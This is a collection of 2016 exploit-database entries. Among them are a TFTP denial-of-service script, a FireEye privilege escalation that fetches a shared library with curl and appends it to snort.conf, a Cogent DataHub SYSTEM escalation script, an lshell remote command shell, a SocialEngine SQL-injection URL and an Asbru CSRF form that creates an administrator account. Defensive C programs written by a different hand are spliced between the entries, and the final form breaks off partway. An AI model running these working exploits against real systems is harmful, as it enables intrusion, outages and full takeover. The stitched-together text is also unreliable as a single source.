# Exploit Title: TallSoft SNMP TFTP Server 1.0.0 - DoS
# Date: 28-03-2016
# Software Link: http://www.tallsoft.com/snmp_tftpserver.exe
# Exploit Author: Charley Celice (stmerry)
# Contact: https://twitter.com/charleycelice
#
# Credits: Based off TallSoft Quick TFTP Server 2.2 DoS
# * https://www.exploit-db.com/exploits/26010/
#
# Category: Denial of Service
# Tested on: Windows XP SP3 English
# Details: Remotely crash TallSoft SNMP TFTP Server

from socket import *
import sys, select

address = ('127.0.0.1', 69)

# sufficient for the crash to work
crash = "\x00\x02\x00"
crash += "\x41"*1019
 
server_socket = socket(AF_INET, SOCK_DGRAM)
server_socket.sendto(crash, address)
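The crash datagram above is a WRQ (opcode 2) whose string fields run on for 1019 bytes with no terminating NUL and no mode string. As an added example, not part of the exploit or of TallSoft's code, the parser below shows how a TFTP server should validate an RRQ/WRQ under RFC 1350: each string field is bounded by its destination array and must be NUL-terminated, so the oversized request is rejected rather than copied into a fixed buffer. The field caps and the rejection of trailing option bytes are this example's choices, and the sample datagrams in main() are constructed.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* RFC 1350 request: 2-byte opcode | filename NUL | mode NUL.
 * Only RRQ (1) and WRQ (2) carry these string fields. */
#define TFTP_OP_RRQ 1
#define TFTP_OP_WRQ 2
/* Caps are this example's choice: no legitimate request needs a longer
 * filename, and the longest defined mode string is "netascii" (8 bytes). */
#define TFTP_MAX_FILENAME 255
#define TFTP_MAX_MODE     8

typedef struct {
    uint16_t opcode;
    char filename[TFTP_MAX_FILENAME + 1];
    char mode[TFTP_MAX_MODE + 1];
} tftp_request_t;

typedef enum {
    TFTP_PARSE_OK = 0,
    TFTP_PARSE_TOO_SHORT,
    TFTP_PARSE_BAD_OPCODE,
    TFTP_PARSE_UNTERMINATED_FILENAME, /* no NUL within the cap or the datagram */
    TFTP_PARSE_UNTERMINATED_MODE,
    TFTP_PARSE_BAD_MODE,
    TFTP_PARSE_TRAILING_DATA
} tftp_parse_result_t;

/* Copies the NUL-terminated field at pkt[*pos] into dst (cap bytes plus the
 * terminator). Fails if the datagram ends or cap is exceeded before a NUL;
 * never reads beyond len. */
static int read_field(const uint8_t *pkt, size_t len, size_t *pos,
                      char *dst, size_t cap) {
    size_t n = 0;
    while (*pos + n < len) {
        if (pkt[*pos + n] == 0) {
            memcpy(dst, pkt + *pos, n);
            dst[n] = '\0';
            *pos += n + 1;
            return 0;
        }
        if (++n > cap)
            return -1;
    }
    return -1;
}

/* RFC 1350 mode names are case-insensitive. */
static int mode_is_valid(const char *mode) {
    static const char *const modes[] = { "netascii", "octet", "mail" };
    char lower[TFTP_MAX_MODE + 1];
    size_t i;
    for (i = 0; mode[i] != '\0' && i < TFTP_MAX_MODE; i++)
        lower[i] = (char)tolower((unsigned char)mode[i]);
    lower[i] = '\0';
    for (i = 0; i < sizeof modes / sizeof modes[0]; i++)
        if (strcmp(lower, modes[i]) == 0)
            return 1;
    return 0;
}

/* Validates and decodes one request datagram. Each field is bounded by its
 * destination array, so an oversized or unterminated request is rejected
 * instead of being copied into a fixed buffer. */
tftp_parse_result_t tftp_parse_request(const uint8_t *pkt, size_t len,
                                       tftp_request_t *out) {
    size_t pos = 2;
    if (len < 4) /* opcode plus two empty NUL-terminated fields */
        return TFTP_PARSE_TOO_SHORT;
    out->opcode = (uint16_t)((pkt[0] << 8) | pkt[1]);
    if (out->opcode != TFTP_OP_RRQ && out->opcode != TFTP_OP_WRQ)
        return TFTP_PARSE_BAD_OPCODE;
    if (read_field(pkt, len, &pos, out->filename, TFTP_MAX_FILENAME))
        return TFTP_PARSE_UNTERMINATED_FILENAME;
    if (read_field(pkt, len, &pos, out->mode, TFTP_MAX_MODE))
        return TFTP_PARSE_UNTERMINATED_MODE;
    if (!mode_is_valid(out->mode))
        return TFTP_PARSE_BAD_MODE;
    if (pos != len) /* RFC 2347 options would start here; this example accepts none */
        return TFTP_PARSE_TRAILING_DATA;
    return TFTP_PARSE_OK;
}

int main(void) {
    /* Constructed inputs: a well-formed WRQ, and the 1022-byte shape of the
     * crash datagram above (opcode 2, empty filename, 1019 x 'A', no NUL). */
    static const uint8_t good[] = "\x00\x02" "boot.bin" "\0" "octet";
    uint8_t crash[3 + 1019];
    tftp_request_t req;
    memset(crash, 'A', sizeof crash);
    crash[0] = 0; crash[1] = 2; crash[2] = 0;
    printf("good  -> %d (ok = %d)\n", tftp_parse_request(good, sizeof good, &req), TFTP_PARSE_OK);
    printf("crash -> %d (unterminated mode = %d)\n",
           tftp_parse_request(crash, sizeof crash, &req), TFTP_PARSE_UNTERMINATED_MODE);
    return 0;
}
```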
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=670

The mip user is already quite privileged, capable of accessing sensitive network data. However, as the child process has supplementary gid contents, there is a very simple privilege escalation to root. This is because the snort configuration is writable by that group:

$ ls -l /data/snort/config/snort.conf
-rw-rw-r-- 1 fenet contents 1332 Dec  2 18:02 /data/snort/config/snort.conf

This can be exploited by placing a shared library in a writable directory that is mounted with the “exec” option, and appending a “dynamicengine” directive to the snort configuration.

# mount | grep -v noexec | grep rw 
...
/dev/sda8 on /var type ext4 (rw,noatime)
/dev/sda11 on /data type ext4 (rw,noatime)
/dev/sda9 on /data/db type ext4 (rw,noatime,barrier=0)
tmpfs on /dev/shm type tmpfs (rw)

It looks like /dev/shm is a good candidate for storing a shared library.

First, I create and compile a shared library on my workstation, as there is no compiler available on the FireEye appliance:

$ cat test.c 
void __attribute__((constructor)) init(void)
{
        system("/usr/bin/id > /tmp/output.txt");
}
$ gcc test.c -shared -s -fPIC -o test.so

Now fetch that object on the FireEye machine, and instruct snort to load it:

fireeye$ curl http://example.com/test.so > /dev/shm/test.so
fireeye$ printf "dynamicengine /dev/shm/test.so\n" >> /data/snort/config/snort.conf

The snort process is regularly restarted to process new rules, so simply wait for the snort process to respawn, and verify we were able to execute commands as root:

fireeye$ cat /tmp/output.txt
uid=0(admin) gid=0(root) groups=0(root)

And now we’re root, with complete control of the FireEye machine. We can load a rootkit, persist across reboots or factory resets, inspect or modify traffic, or perform any other action.
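The escalation above rests on two checkable conditions: a snort.conf that a non-root group can write, and a dynamicengine path on a filesystem that is both writable and mounted exec. The program below is an added example, not from the report or from FireEye, that audits for both: it tests the configuration file's mode bits and flags every dynamicengine/dynamicpreprocessor/dynamicdetection path that lies outside a trusted library directory. The trusted directory (/usr/lib in the demo) and the sample configuration text are this example's assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#define MAX_LINE 1024
/* Directives that make snort dlopen() a path taken from its configuration. */
static const char *const LOADER_DIRECTIVES[] = {
    "dynamicengine", "dynamicpreprocessor", "dynamicdetection"
};
#define N_DIRECTIVES (sizeof LOADER_DIRECTIVES / sizeof LOADER_DIRECTIVES[0])

/* 1 if the file is writable by its group or by others (the snort.conf
 * condition above), 0 if only the owner may write, -1 if stat() fails. */
int config_writable_by_non_owner(const char *path) {
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (st.st_mode & (S_IWGRP | S_IWOTH)) ? 1 : 0;
}

/* Skips whitespace; returns the next token and its length (0 at end of line). */
static const char *next_token(const char *s, size_t *len) {
    s += strspn(s, " \t\r\n");
    *len = strcspn(s, " \t\r\n");
    return s;
}

/* If line is a loader directive, copies its library path into out and returns 1.
 * Handles "dynamicengine /path/lib.so" and "dynamicengine directory /path". */
int loader_path_from_line(const char *line, char *out, size_t cap) {
    size_t tlen, i;
    const char *tok = next_token(line, &tlen);
    if (tlen == 0 || tok[0] == '#')
        return 0;
    for (i = 0; i < N_DIRECTIVES; i++)
        if (strlen(LOADER_DIRECTIVES[i]) == tlen &&
            strncmp(tok, LOADER_DIRECTIVES[i], tlen) == 0)
            break;
    if (i == N_DIRECTIVES)
        return 0;
    tok = next_token(tok + tlen, &tlen);
    if (tlen == 9 && strncmp(tok, "directory", 9) == 0)
        tok = next_token(tok + tlen, &tlen);
    if (tlen == 0 || tlen >= cap)
        return 0;
    memcpy(out, tok, tlen);
    out[tlen] = '\0';
    return 1;
}

/* 1 if path lies inside trusted_dir (the match must end on a separator). */
int path_under(const char *path, const char *trusted_dir) {
    size_t n = strlen(trusted_dir);
    return strncmp(path, trusted_dir, n) == 0 &&
           (path[n] == '/' || path[n] == '\0');
}

/* Walks newline-separated configuration text and records every loader path
 * outside trusted_dir in findings; returns how many were recorded. */
int untrusted_loader_paths(const char *config_text, const char *trusted_dir,
                           char findings[][MAX_LINE], int max_findings) {
    int count = 0;
    const char *p = config_text;
    while (*p != '\0' && count < max_findings) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[MAX_LINE], path[MAX_LINE];
        if (len >= sizeof line)
            len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        if (loader_path_from_line(line, path, sizeof path) &&
            !path_under(path, trusted_dir))
            strcpy(findings[count++], path);
        if (nl == NULL)
            break;
        p = nl + 1;
    }
    return count;
}

/* Constructed snort.conf excerpt for the demo, not an appliance's real file;
 * the last line is the kind of entry the escalation above appends. */
static const char SAMPLE_CONF[] =
    "# constructed sample\n"
    "config daq: afpacket\n"
    "dynamicengine /usr/lib/snort_dynamicengine/libsf_engine.so\n"
    "dynamicpreprocessor directory /usr/lib/snort_dynamicpreprocessor\n"
    "preprocessor frag3_global\n"
    "dynamicengine /dev/shm/test.so\n";

int main(int argc, char **argv) {
    char findings[16][MAX_LINE];
    int i, n = untrusted_loader_paths(SAMPLE_CONF, "/usr/lib", findings, 16);
    for (i = 0; i < n; i++)
        printf("loader path outside /usr/lib: %s\n", findings[i]);
    if (argc > 1) /* optional: a real file to check, e.g. /data/snort/config/snort.conf */
        printf("%s writable by group/others: %d\n", argv[1],
               config_writable_by_non_owner(argv[1]));
    return 0;
}
```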
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=678

The wireless driver for the Android One (sprout) devices has a bad copy_from_user in the handling for the wireless driver socket private read ioctl IOCTL_GET_STRUCT with subcommand PRIV_CMD_SW_CTRL.

This ioctl is permitted for access from the untrusted-app selinux domain, so this is an app-to-kernel privilege escalation from any app with android.permission.INTERNET.

See hello-jni.tar.gz for a PoC (NDK required to build) that should redirect kernel code execution to 0x40404040.

[   56.843672]-(0)[880:tx_thread]CPU: 0 PID: 880 Comm: tx_thread Tainted: G        W    3.10.57-g9e1c396 #1
[   56.844867]-(0)[880:tx_thread]task: dea3b480 ti: cb99e000 task.ti: cb99e000
[   56.845731]-(0)[880:tx_thread]PC is at 0x40404040
[   56.846319]-(0)[880:tx_thread]LR is at kalDevPortWrite+0x1c8/0x484
[   56.847092]-(0)[880:tx_thread]pc : [<40404040>]    lr : [<c0408be4>]    psr: a0000013
[   56.847092]sp : cb99fdb0  ip : c001813c  fp : cb99fe0c
[   56.848705]-(0)[880:tx_thread]r10: c0cac2f0  r9 : 0000af00  r8 : 00000110
[   56.849552]-(0)[880:tx_thread]r7 : 0000002c  r6 : cc0a63c0  r5 : 00000001  r4 : c0cade08
[   56.850560]-(0)[880:tx_thread]r3 : 40404040  r2 : 00000040  r1 : dd5d0110  r0 : 00000001
[   56.851570]-(0)[880:tx_thread]Flags: NzCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment kernel
[   56.852675]-(0)[880:tx_thread]Control: 10c5387d  Table: 9e9b006a  DAC: 00000015
[   56.853585]-(0)[880:tx_thread]
[   56.923880]-(0)[880:tx_thread]Process tx_thread (pid: 880, stack limit = 0xcb99e248)
[   56.924845]-(0)[880:tx_thread]Stack: (0xcb99fdb0 to 0xcb9a0000)
[   56.948658]Backtrace: 
[   56.948966]-(0)[880:tx_thread][<c0408a1c>] (kalDevPortWrite+0x0/0x484) from [<c03db164>] (nicTxCmd+0x354/0x638)
[   56.950213] r9:00000000 r8:dd5d0000 r7:00000110 r6:e54b5d10 r5:e54af000 r4:e54b6168
[   56.951190]-(0)[880:tx_thread][<c03dae10>] (nicTxCmd+0x0/0x638) from [<c03bd0f4>] (wlanSendCommand+0x194/0x220)
[   56.952449]-(0)[880:tx_thread][<c03bcf60>] (wlanSendCommand+0x0/0x220) from [<c03bd540>] (wlanProcessCommandQueue+0x24c/0x474)
[   56.953859] r6:00000000 r5:e54b6168 r4:00000000 r3:00000001
[   56.954568]-(0)[880:tx_thread][<c03bd2f4>] (wlanProcessCommandQueue+0x0/0x474) from [<c03efce4>] (tx_thread+0x310/0x640)
[   56.955927]-(0)[880:tx_thread][<c03ef9d4>] (tx_thread+0x0/0x640) from [<c008fadc>] (kthread+0xbc/0xc0)
[   56.957088]-(0)[880:tx_thread][<c008fa20>] (kthread+0x0/0xc0) from [<c000e618>] (ret_from_fork+0x14/0x3c)
[   56.958270] r7:00000000 r6:00000000 r5:c008fa20 r4:dd5bfdbc
[   56.958970]-(0)[880:tx_thread]Code: bad PC value
[   56.959544]-(0)[880:tx_thread]---[ end trace 1b75b31a2719ed1f ]---
[   56.960313]-(0)[880:tx_thread]Kernel panic - not syncing: Fatal exception

The vulnerable code is in /drivers/misc/mediatek/conn_soc/drv_wlan/mt_wifi/wlan/os/linux/gl_wext_priv.c:1632

    case PRIV_CMD_SW_CTRL:
        pu4IntBuf = (PUINT_32)prIwReqData->data.pointer;
        prNdisReq = (P_NDIS_TRANSPORT_STRUCT) &aucOidBuf[0];

        //kalMemCopy(&prNdisReq->ndisOidContent[0], prIwReqData->data.pointer, 8);
        if (copy_from_user(&prNdisReq->ndisOidContent[0],
                           prIwReqData->data.pointer,
                           prIwReqData->data.length)) {
            status = -EFAULT;
            break;
        }
        prNdisReq->ndisOidCmd = OID_CUSTOM_SW_CTRL;
        prNdisReq->inNdisOidlength = 8;
        prNdisReq->outNdisOidLength = 8;

        /* Execute this OID */
        status = priv_set_ndis(prNetDev, prNdisReq, &u4BufLen);
        break;

prNdisReq->ndisOidContent is in a static allocation of size 0x1000, and prIwReqData->data.length is a usermode controlled unsigned short, so the copy_from_user results in memory corruption.
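The copy_from_user above takes its length from data.length, a 16-bit value chosen by the caller, and never compares it against the destination. The C below is an added example, not the MediaTek driver's code, that places the overrun arithmetic beside the bounded handler a fix would use: the length is rejected before anything is copied. The struct layout, the union standing in for aucOidBuf, the OID_CUSTOM_SW_CTRL placeholder value and the userspace stand-in for copy_from_user are assumptions.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define OID_BUF_SIZE 0x1000   /* size of the static allocation named in the report */
#define OID_CUSTOM_SW_CTRL 0  /* placeholder: the real value is not given on the page */

/* Assumed shape of the driver's NDIS_TRANSPORT_STRUCT: a short header followed
 * by the OID payload, laid over the 0x1000-byte static buffer. */
typedef struct {
    uint32_t ndisOidCmd;
    uint32_t inNdisOidlength;
    uint32_t outNdisOidLength;
    uint8_t  ndisOidContent[OID_BUF_SIZE - 3 * sizeof(uint32_t)];
} ndis_transport_t;

/* aucOidBuf as a union so the struct view is correctly aligned; this stands in
 * for the prNdisReq = (P_NDIS_TRANSPORT_STRUCT)&aucOidBuf[0] cast in the snippet. */
static union {
    uint8_t raw[OID_BUF_SIZE];
    ndis_transport_t req;
} aucOidBuf;

/* Userspace stand-in for copy_from_user(): 0 on success, nonzero on fault. */
static int fake_copy_from_user(void *to, const void *from, size_t n) {
    if (from == NULL) /* model an unmapped user pointer */
        return 1;
    memcpy(to, from, n);
    return 0;
}

/* The vulnerable arithmetic: data.length is a user-controlled unsigned short,
 * so copying that many bytes into ndisOidContent overruns the array by this
 * much. Computed only, never performed. */
size_t sw_ctrl_overrun_bytes(uint16_t user_len) {
    size_t cap = sizeof(aucOidBuf.req.ndisOidContent);
    return user_len > cap ? user_len - cap : 0;
}

/* Bounded handler: the length is checked against the destination array before
 * anything is copied. The command consumes 8 payload bytes (the handler sets
 * in/outNdisOidLength to 8), so a stricter variant could demand exactly 8. */
int sw_ctrl_copy_checked(const void *user_ptr, uint16_t user_len) {
    ndis_transport_t *req = &aucOidBuf.req;
    if (user_len > sizeof(req->ndisOidContent))
        return -EINVAL;
    if (fake_copy_from_user(req->ndisOidContent, user_ptr, user_len))
        return -EFAULT;
    req->ndisOidCmd = OID_CUSTOM_SW_CTRL;
    req->inNdisOidlength = 8;
    req->outNdisOidLength = 8;
    return 0;
}

int main(void) {
    static const uint8_t payload[8] = { 1, 2, 3, 4, 5, 6, 7, 8 }; /* constructed */
    printf("overrun for length 0xffff: %zu bytes\n", sw_ctrl_overrun_bytes(0xffff));
    printf("checked copy, len 8:      %d\n", sw_ctrl_copy_checked(payload, 8));
    printf("checked copy, len 0xffff: %d (-EINVAL is %d)\n",
           sw_ctrl_copy_checked(payload, 0xffff), -EINVAL);
    return 0;
}
```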


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39629.zip
            
/*

# Exploit Title: Cogent Datahub <= 7.3.9 Gamma Script Elevation of Privilege Vulnerability
# Google Dork: lol
# Date: 28/3/2016
# Exploit Author: mr_me
# Vendor Homepage: http://www.cogentdatahub.com/
# Software Link: http://www.cogentdatahub.com/Contact_Form.html
# Version: <= 7.3.9
# Tested on: Windows 7 x86
# CVE : CVE-2016-2288

sha1sum: c1806faf0225d0c7f96848cb9799b15f8b249792  CogentDataHub-7.3.9-150902-Windows.exe
Advisory: https://ics-cert.us-cert.gov/advisories/ICSA-16-084-01

Timeline:
=========
- 02/12/2015 : vuln found, case opened to the zdi
- 09/02/2016 : case rejected (not interested in this vuln due to vector)
- 26/02/2016 : reported to ICS-CERT
- 24/03/2016 : advisory released

Notes:
======
- to reach SYSTEM, the service needs to be installed via the Service Manager
- the service doesn't need to be installed, as long as 'C:\Program Files\Cogent\Cogent DataHub\CogentDataHubV7.exe' has been executed by a privileged user
- an attacker does NOT need to restart the machine or the service in order to escalate privileges; the service just polls for the Gamma Script

Exploitation:
=============

As a Guest user (or other low-privileged user), save this file as 'WebstreamSupport.g' into C:\usr\cogent\require\ and enjoy the free SYSTEM calcs. Most OSes don't allow
a write into c:\ as Guest, but we are in the SCADA world. Anything is possible.

C:\Users\steven>sc qc "Cogent DataHub"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Cogent DataHub
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\Cogent\Cogent DataHub\CogentDataHubV7.exe" -H "C:\Users\steven\AppData\Roaming\Cogent DataHub"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Cogent DataHub
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem

C:\Users\steven>
*/

require ("Application");
require ("AsyncRun");				// thanks to our friends @ Cogent

class WebstreamSupport Application
{

}

method WebstreamSupport.constructor ()
{
	RunCommandAsync(nil, nil, "cmd.exe /c calc", "c:\\");
}

Webstream = ApplicationSingleton (WebstreamSupport);
            
Sources: 
https://bugs.chromium.org/p/project-zero/issues/detail?id=716
https://googleprojectzero.blogspot.ca/2016/03/life-after-isolated-heap.html

The bug is an uninitialized variable in the fix to an ActionScript 2 use-after-free bug. Roughly 80 of these types of issues have been fixed by Adobe in the past year, and two uninitialized variable issues were introduced in the fixes. 

This issue is fairly easy to reproduce; a proof-of-concept for this issue in its entirety is:

var o = {};
o.unwatch();

The bug occurs because the use-after-free check in the unwatch method attempts to convert its first parameter to a string by calling toString on it before continuing with the part of the method where toString could cause problems by freeing an object. However, Flash does not check that this parameter exists before calling toString on it. In pseudo-code, the rough behaviour of this method is:

void* args = alloca( args_size );
for( int i = 0; i < args_size; i++){
    // Init args
}

if ( (((int) args[0]) & 6) == 6 )
    args[0] = call_toString( args[0] );

if ( args_size < 1)
    exit();


Exploit:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39631.zip
            
import sys
import paramiko
import traceback
from time import sleep

#
# Exploit lshell pathing vulnerability in <= 0.9.15.
# Runs commands on the remote system.
# @dronesec
#

if len(sys.argv) < 4:
    print '%s: [USER] [PW] [IP] {opt: port}'%(sys.argv[0])
    sys.exit(1)

try:
    print '[!] .............................'
    print '[!] lshell <= 0.9.15 remote shell.'
    print '[!] note: you can also ssh in and execute \'/bin/bash\''
    print '[!] .............................'
    print '[!] Checking host %s...'%(sys.argv[3])
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    if len(sys.argv) == 5:
        ssh.connect(sys.argv[3],port=int(sys.argv[4]),username=sys.argv[1],password=sys.argv[2])
    else:
        ssh.connect(sys.argv[3],username=sys.argv[1],password=sys.argv[2])


    # verify lshell 
    channel = ssh.invoke_shell()
    while not channel.recv_ready(): sleep(1)
    ret = channel.recv(2048)

    channel.send('help help\n')
    while not channel.recv_ready(): sleep(1)
    ret = channel.recv(2048)

    if not 'lshell' in ret:
        if 'forbidden' in ret:
            print '[-] Looks like we can\'t execute SSH commands'
        else:
            print '[-] Environment is not lshell'
        sys.exit(1)

    # verify vulnerable version
    channel.send('sudo\n')
    while not channel.recv_ready(): sleep(1)
    ret = channel.recv(2048)
    if not 'Traceback' in ret:
        print '[-] lshell version not vulnerable.'
        sys.exit(1)
    channel.close()
    ssh.close()

    # exec shell
    print '[+] vulnerable lshell found, preparing pseudo-shell...'
    if len(sys.argv) == 5:
        ssh.connect(sys.argv[3],port=int(sys.argv[4]),username=sys.argv[1],password=sys.argv[2])
    else:
        ssh.connect(sys.argv[3],username=sys.argv[1],password=sys.argv[2])

    while True:
        cmd = raw_input('$ ')

        # breaks paramiko
        if cmd.startswith('/'):
            print '[!] Running binaries won\'t work!'
            continue

        cmd = cmd.replace("'", r"\'")
        cmd = 'echo __import__(\'os\').system(\'%s\')'%(cmd.replace(' ',r'\t'))
        if len(cmd) > 1:
            if 'quit' in cmd or 'exit' in cmd:
                break
            (stdin,stdout,stderr) = ssh.exec_command(cmd)
        out = stdout.read()
        print out.strip()
except paramiko.AuthenticationException:
    print '[-] Authentication to %s failed.'%sys.argv[3]
except Exception, e:
    print '[-] Error: ', e
    print type(e)
    traceback.print_exc(file=sys.stdout)
finally:
    channel.close()
    ssh.close()
            
#####################################################################################

Application: Apple Quicktime

Platforms: Windows, OSX

Versions: before version 7.7.79.80.95

Author: Francis Provencher of COSIG

Website: http://www.protekresearchlab.com/

Twitter: @COSIG_ @protekresearch

CVE-2016-1767

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

===============
1) Introduction
===============

QuickTime is an extensible multimedia framework developed by Apple Inc., capable of handling various formats of digital video, picture, sound, panoramic images, and interactivity. The classic version of QuickTime is available for Windows Vista and later, as well as Mac OS X Leopard and later operating systems. A more recent version, QuickTime X, is currently available on Mac OS X Snow Leopard and newer.

(https://en.wikipedia.org/wiki/QuickTime)

#####################################################################################

============================
2) Report Timeline
============================

2016-01-07: Francis Provencher from COSIG reported the issue to the Apple security team;
2016-01-13: the Apple security team confirmed this issue;
2016-03-22: Apple fixed this issue;

https://support.apple.com/en-us/HT206167
#####################################################################################

============================
3) Technical details
============================

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime.
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

By providing a malformed FPX file, an attacker is able to create controlled memory corruption, and execute code in the context of the current user.

#####################################################################################

===========
4) POC
===========

Proof of Concept:
http://protekresearchlab.com/exploits/COSIG-2016-14.fpx
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39633.zip

###############################################################################
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=611

There is a use-after-free in URLStream.readObject. If the object read is a registered class, the constructor will get invoked to create the object. If the constructor calls URLStream.close, the URLStream will get freed, and then the deserialization function will continue to write to it.

A minimal PoC is as follows:

//In main

flash.net.registerClassAlias("bob", myclass);

var u:URLStream = new URLStream();
myclass.u = u;
u.addEventListener(Event.COMPLETE, func);
u.load(new URLRequest("file.txt"));

function func(){
	trace(u.readObject());
}

// in myclass

static public var u;

public function myclass()
{
	u.close();
}

A sample script and SWF are attached. Note that file.txt needs to be in the same folder as getproperty.swf on a remote server.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39649.zip
            
Advisory ID: HTB23286
Product: SocialEngine
Vendor: Webligo
Vulnerable Version(s): 4.8.9 and probably prior
Tested Version: 4.8.9
Advisory Publication:  December 21, 2015  [without technical details]
Vendor Notification: December 21, 2015 
Public Disclosure: April 6, 2016 
Vulnerability Type: SQL Injection [CWE-89]
Risk Level: High 
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered an SQL injection vulnerability in the popular social networking software SocialEngine. The vulnerability can be exploited to gain access to potentially sensitive information in the database and compromise the entire website.

The vulnerability exists due to insufficient filtration of input data passed via the "orderby" HTTP GET parameter to the "/index.php" script. A remote unauthenticated attacker can modify the present query and execute arbitrary SQL commands in the application's database.

A simple exploit below uses a time-based SQL injection technique to demonstrate the existence of the vulnerability. The following HTTP request will make the page render for 99 seconds if the MySQL server version is equal to "5":

http://[host]/blogs/?category=0&end_date=&orderby=1%20AND%20%28SELECT%20*%20FROM%20%28SELECT%28SLEEP%28IF%28MID%28version%28%29,1,1%29%20LIKE%205,99,0%29%29%29%29MTeU%29

-----------------------------------------------------------------------------------------------

Solution:

Update to SocialEngine 4.8.10

More Information:
http://blog.socialengine.com/2016/01/20/socialengine-php-4-8-10-is-released/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23286 - https://www.htbridge.com/advisory/HTB23286 - SQL Injection in SocialEngine
[2] SocialEngine - http://www.socialengine.com/ - SocialEngine is PHP community software that helps you build your own custom social network website. Advanced social networking features include blogs, photo albums, user groups and forums, providing complete control over the layout and functionality of your social network, community, forum, or portal.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
            

Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities


Vendor: Asbru Ltd.
Product web page: http://www.asbrusoft.com
Affected version: 9.2.7

Summary: Ready to use, full-featured, database-driven web content management
system (CMS) with integrated community, databases, e-commerce and statistics
modules for creating, publishing and managing rich and user-friendly Internet,
Extranet and Intranet websites.

Desc: Asbru WCM suffers from multiple vulnerabilities including Cross-Site Request
Forgery, Stored Cross-Site Scripting, Open Redirect and Information Disclosure.

Tested on : Apache Tomcat/5.5.23
            Apache/2.2.3 (CentOS)


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2016-5314
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php


09.03.2016

--


#1
Directory Traversal:
--------------------

http://10.0.0.7/../../../../../WEB-INF/web.xml


#2
Open Redirect:
--------------

http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk


#3
Cross-Site Request Forgery (Add 'administrator' With Full Privileges):
----------------------------------------------------------------------

<html>
  <body>
    <form action="http://10.0.0.7/webadmin/users/create_post.jsp?id=&redirect=" method="POST">
      <input type="hidden" name="userinfo" value="&#13;&#10;<TEST><&#47;TEST>&#13;&#10;" />
      <input type="hidden" name="title" value="Mr" />
      <input type="hidden" name="name" value="Chekmidash" />
      <input type="hidden" name="organisation" value="ZSL" />
      <input type="hidden" name="email" value="test&#64;testingus&#46;io" />
      <input type="hidden" name="gender" value="1" />
      <input type="hidden" name="birthdate" value="1984&#45;01&#45;01" />
      <input type="hidden" name="birthday" value="01" />
      <input type="hidden" name="birthmonth" value="01" />
      <input type="hidden" name="birthyear" value="1984" />
      <input type="hidden" name="notes" value="CSRFNote" />
      <input type="hidden" name="userinfo1" value="" />
      <input type="hidden" name="userinfoname" value="" />
      <input type="hidden" name="username" value="hackedusername" />
      <input type="hidden" name="password" value="password123" />
      <input type="hidden" name="userclass" value="administrator" />
      <input type="hidden" name="usergroup" value="" />
      <input type="hidden" name="usertype" value="" />
      <input type="hidden" name="usergroups" value="Account&#32;Managers" />
      <input type="hidden" name="usergroups" value="Company&#32;Bloggers" />
      <input type="hidden" name="usergroups" value="Customer" />
      <input type="hidden" name="usergroups" value="Event&#32;Managers" />
      <input type="hidden" name="usergroups" value="Financial&#32;Officers" />
      <input type="hidden" name="usergroups" value="Forum&#32;Moderator" />
      <input type="hidden" name="usergroups" value="Human&#32;Resources" />
      <input type="hidden" name="usergroups" value="Intranet&#32;Managers" />
      <input type="hidden" name="usergroups" value="Intranet&#32;Users" />
      <input type="hidden" name="usergroups" value="Newsletter" />
      <input type="hidden" name="usergroups" value="Press&#32;Officers" />
      <input type="hidden" name="usergroups" value="Product&#32;Managers" />
      <input type="hidden" name="usergroups" value="Registered&#32;Users" />
      <input type="hidden" name="usergroups" value="Shop&#32;Managers" />
      <input type="hidden" name="usergroups" value="Subscribers" />
      <input type="hidden" name="usergroups" value="Support&#32;Ticket&#32;Administrators" />
